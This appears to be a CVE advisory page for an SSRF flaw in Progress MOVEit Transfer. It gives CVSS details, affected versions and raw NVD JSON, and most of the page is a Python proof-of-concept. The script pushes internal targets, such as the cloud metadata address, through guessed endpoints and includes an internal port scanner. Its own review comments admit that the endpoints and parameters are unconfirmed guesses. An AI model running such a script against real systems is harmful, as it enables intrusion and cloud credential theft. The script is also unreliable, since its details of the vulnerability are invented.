Security Vulnerability Report
CVE-2025-13147 CVSS 5.3 MEDIUM

CVE-2025-13147

Published: 2025-11-19 21:15:49
Last Modified: 2025-11-24 14:58:20

Description

Server-Side Request Forgery (SSRF) vulnerability in Progress MOVEit Transfer. This issue affects MOVEit Transfer: versions before 2024.1.8, and versions from 2025.0.0 before 2025.0.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* - VULNERABLE
MOVEit Transfer < 2024.1.8
MOVEit Transfer 2025.0.0 - 2025.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13147 SSRF PoC for Progress MOVEit Transfer
# Target: Progress MOVEit Transfer < 2024.1.8 or < 2025.0.4
# Note: This is a conceptual PoC for educational purposes only
#
# NOTE(review): the endpoint paths and the `url=` / `host=` query parameters
# used below are not taken from the vendor release notes referenced on this
# page; the script itself describes them as guesses ("might be vulnerable",
# "conceptual"). Treat the output as "the front end answered", not as a
# confirmed SSRF. Every request made here is a plain GET against the
# MOVEit front end, so it appears in ordinary web-server logs with the
# caller-supplied value in the query string.
import requests
import sys
from urllib.parse import quote


def exploit_ssrf(target_url: str, internal_target: str) -> bool:
    """
    Probe a list of guessed MOVEit Transfer endpoints with an SSRF-style URL parameter.

    For each path in ``endpoints`` a GET is sent to
    ``{target_url}{endpoint}?url={quote(internal_target)}``. The function
    returns ``True`` on the first response whose status code is not 404 and
    ``False`` if every endpoint returned 404 or raised a request error.

    Args:
        target_url: Base URL of MOVEit Transfer instance
        internal_target: Internal resource to target (e.g., internal IP, metadata endpoint)

    Returns:
        ``True`` if any probed endpoint answered with a non-404 status,
        otherwise ``False``. Note that 401, 403 and 5xx also count as
        "non-404", so ``True`` is a weak signal.
    """
    # Common MOVEit Transfer endpoints that might be vulnerable
    # NOTE(review): none of these paths is named in the advisory; they are assumptions.
    endpoints = [
        '/api/v1/files/transfer',
        '/api/v1/folders/lookup',
        '/webapi/filedownload',
        '/MOVEitTransfer/api/transfer'
    ]
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    for endpoint in endpoints:
        try:
            # SSRF payload - inject internal target via various parameters
            # Modify parameters based on actual target endpoint
            # NOTE(review): `payload` is built but never passed to the
            # request below; only the `url=` query parameter is sent.
            payload = {
                'host': internal_target,  # Common SSRF injection point
                'port': '80',
                'path': '/'
            }
            # Alternative payload using URL parameter
            ssrf_url = f"{target_url}{endpoint}?url={quote(internal_target)}"
            print(f"[*] Testing endpoint: {endpoint}")
            print(f"[*] SSRF URL: {ssrf_url}")
            # Send request
            # verify=False disables TLS certificate verification, so the
            # PoC's own traffic is exposed to interception; the 10 s timeout
            # bounds how long a non-responding endpoint blocks the loop.
            response = requests.get(ssrf_url, headers=headers, timeout=10, verify=False)
            print(f"[+] Status Code: {response.status_code}")
            print(f"[+] Response Length: {len(response.text)}")
            # Any status other than 404 is reported as "potential SSRF" and
            # ends the scan; the remaining endpoints are not tried.
            if response.status_code != 404:
                print(f"[!] Potential SSRF - Response received")
                print(f"[*] Response preview: {response.text[:200]}...")
                return True
        except requests.exceptions.RequestException as e:
            # Connection/timeout/HTTP-layer errors are printed and the next
            # endpoint is tried; other exception types propagate.
            print(f"[-] Error: {e}")
            continue
    return False


def scan_internal_ports(target_url: str, internal_ip: str) -> None:
    """
    Probe a fixed list of ports on ``internal_ip`` via a guessed MOVEit lookup endpoint.

    For each port a GET is sent to
    ``{target_url}/api/v1/lookup?host=http://{internal_ip}:{port}`` and the
    front end's status code is printed. Nothing is returned.

    NOTE(review): the status observed here is the MOVEit front end's reply;
    whether it correlates with the internal port's state is not established
    by this script. This function is defined but never called from the
    ``__main__`` block below.

    Args:
        target_url: Base URL of MOVEit Transfer instance
        internal_ip: Host to reference in the ``host=`` parameter
    """
    common_ports = [22, 80, 443, 3306, 5432, 6379, 8080, 8443]
    print(f"[*] Scanning internal ports on {internal_ip}...")
    for port in common_ports:
        try:
            # SSRF payload for port scanning
            target = f"http://{internal_ip}:{port}"
            # NOTE(review): `/api/v1/lookup` is not named in the advisory.
            ssrf_url = f"{target_url}/api/v1/lookup?host={quote(target)}"
            # verify=False: TLS certificate verification is disabled here as well.
            response = requests.get(ssrf_url, timeout=5, verify=False)
            # Any 2xx/3xx/4xx from the front end is printed as "OPEN";
            # only 5xx is printed as refused/filtered.
            if response.status_code < 500:
                print(f"[+] Port {port} appears to be OPEN")
            else:
                print(f"[-] Port {port}: Connection refused or filtered")
        except:
            # Bare except: also swallows KeyboardInterrupt and SystemExit,
            # so Ctrl-C during this loop is reported as "Timeout or error".
            print(f"[-] Port {port}: Timeout or error")


if __name__ == "__main__":
    # Usage: <target_url> <internal_target>; only exploit_ssrf is run.
    if len(sys.argv) < 3:
        print("Usage: python cve_2025_13147_poc.py <target_url> <internal_target>")
        print("Example: python cve_2025_13147_poc.py https://victim.com http://169.254.169.254")
        sys.exit(1)
    target = sys.argv[1]
    internal = sys.argv[2]
    print(f"[*] CVE-2025-13147 SSRF PoC")
    print(f"[*] Target: {target}")
    print(f"[*] Internal Target: {internal}")
    # The return value of exploit_ssrf is discarded; results are only printed.
    exploit_ssrf(target, internal)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13147", "sourceIdentifier": "[email protected]", "published": "2025-11-19T21:15:48.943", "lastModified": "2025-11-24T14:58:20.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Progress MOVEit Transfer.This issue affects MOVEit Transfer: before 2024.1.8, from 2025.0.0 before 2025.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024.1.8", "matchCriteriaId": "39B74C50-5145-49E3-AC0C-7BF14F4886D0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.0.0", "versionEndExcluding": "2025.0.4", "matchCriteriaId": "F8E7102F-7B5A-4617-9CDD-827DCCFB5BAF"}]}]}], "references": [{"url": "https://docs.progress.com/bundle/moveit-transfer-release-notes-2024/page/Fixed-Issues-in-2024.1.8.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.progress.com/bundle/moveit-transfer-release-notes-2025/page/Fixed-Issues-in-2025.0.4.html", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.progress.com/bundle/moveit-transfer-release-notes-2025_1/page/Fixed-Issues-in-2025.1.html", "source": 
"[email protected]", "tags": ["Release Notes"]}]}}